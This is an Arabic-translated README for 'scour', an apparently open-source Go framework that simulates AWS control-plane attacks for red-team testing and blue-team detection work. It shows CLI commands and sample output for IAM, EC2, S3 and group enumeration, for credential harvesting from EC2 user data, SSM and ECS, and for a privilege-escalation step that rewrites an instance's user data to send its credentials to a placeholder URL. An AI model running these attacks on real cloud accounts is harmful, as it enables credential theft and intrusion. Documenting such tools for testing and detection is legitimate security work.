
إطار عمل استغلال AWS قائم على الوحدات لاختبار الفريق الأحمر وتحليل الفريق الأزرق. يحاكي أنماط الهجوم في مستوى التحكم في AWS مع تتبع فريد لـ UA لتطوير الاكتشاف.
تُستخدم هذه الأداة لمحاكاة أنماط الهجوم داخل مستوى التحكم في AWS. يتم وضع علامة على كل هجوم بواسطة UA محددة للفريق الأزرق للإشارة إليها.
لا يزال هذا عملاً قيد التقدم. **الكثير من الأخطاء
غير جاهز للإنتاج
مكان تقديم المشكلات: https://github.com/grines/scour/issues
يتم الصيانة بواسطة: grines
سكور هو إطار عمل حديث يعتمد على الوحدات لاستغلال AWS مكتوب بلغة golang، مصمم لاختبار الفريق الأحمر وتحليل الفريق الأزرق. يحتوي سكور على تقنيات حديثة يمكن استخدامها لمهاجمة البيئات أو بناء اكتشافات للدفاع.
سكور مكتوب بلغة golang لذا من السهل توزيعه كملف ثنائي.
##قابل للتحميل
go get github.com/grines/scour
##بناء
go build main.go
للحصول على مجموعة أكثر تفصيلاً وسهولة في الاستخدام من تعليمات المستخدم، يرجى مراجعة دليل التثبيت في الويكي. **قريباً
يستخدم سكور مجموعة من الوحدات:
عند تشغيل سكور لأول مرة،
token profile <profile_name> <region> سيسرد ملفات تعريف aws المتاحة المخزنة في ~/aws/credentials.token AssumeRole <role_name> <region> سيفترض دورًا من نفس الحساب أو عبر الحسابات. ** يتطلب جلسة نشطةhelp module سيعيد معلومات المساعدة المناسبة للوحدة المحددة. **المساعدة سيتم تحديدها لاحقاًattack evasion <tactic> سيشغل الوحدة المحددة مع معلماتها الافتراضية.scour سيدخل وضع واجهة الأوامر (CLI)Not Connected <> token profile apiuser us-east-1 يحدد الجلسة لاستخدامها للأوامر التي تتطلب ذلكConnected <apiuser/us-east-1> متصل بنشاط بملف تعريف aws من (~,/aws/credentials) في (region)Connected <apiuser/us-east-1> attack enum <attack> إكمال تلقائي بقائمة تكتيكات التعداد المتاحةConnected <apiuser/us-east-1> attack privesc <attack> إكمال تلقائي بقائمة تكتيكات تصعيد الامتيازات المتاحةConnected <apiuser/us-east-1> attack lateral <attack> إكمال تلقائي بقائمة التكتيكات الجانبية المتاحةConnected <apiuser/us-east-1> attack evasion <attack> إكمال تلقائي بقائمة تكتيكات المراوغة المتاحةConnected <apiuser/us-east-1> attack creds <attack> إكمال تلقائي بقائمة تكتيكات اكتشاف بيانات الاعتماد المتاحةConnected <apiuser/us-east-1> attack execute <attack> إكمال تلقائي بقائمة تكتيكات التنفيذ المتاحةConnected <apiuser/us-east-1> attack persist <attack> إكمال تلقائي بقائمة تكتيكات الاستمرارية المتاحة
Connected <apiuser/us-east-1> attack enum IAM اكتشاف IAM+-------------+---------------------+------------------+---------------+--------------+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | | true |
+-------------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles اكتشاف الأدوارUA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861******:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2 اكتشاف EC2UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3 اكتشاف S3UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true | false | false | | false | | false | |
| bullsecu********* | true | true | false | | false | | false | |
| connect-6ec*****ad67 | false | false | false | | false | | false | |
| connect-******5337c3 | false | false | false | | false | | false | |
| ransom******** | true | false | false | | false | | false | |
| red******** | false | false | false | | false | | false | |
| rep-***** | false | false | false | | false | | false | us-west-2 |
| terraform******* | false | false | false | | false | | false | |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups اكتشاف المجموعاتUA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
Connected <apiuser/us-east-1> attack enum Network اكتشاف الشبكةTBD

Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data سرقة بيانات اعتماد البيانات الوصفية من EC2. إيقاف المثيل / تحديث بيانات المستخدم لنشر بيانات الاعتماد إلى عنوان URL المقدم / بدء المثيل (يرسل رمز EC2 إلى عنوان URL.)[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 - State: pending

Connected <apiuser/us-east-1> attack creds UserData الاستيلاء على بيانات الاعتماد من userdata في EC2UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID | RULE | FINDING |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+---------------------+------------------+-------------------------------------------------------------------------------+
Connected <apiuser/us-east-1> attack creds SSM الاستيلاء على بيانات الاعتماد من Systems ManagerUA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE |
+------------+----------+----------------------+
| Test | text | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS الاستيلاء على بيانات الاعتماد من ECSUA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret | heere | sample-app |
+-------------+-------+------------+
Connected <apiuser/us-east-1> attack exfil <attack> إكمال تلقائي بقائمة تكتيكات التسريب المتاحة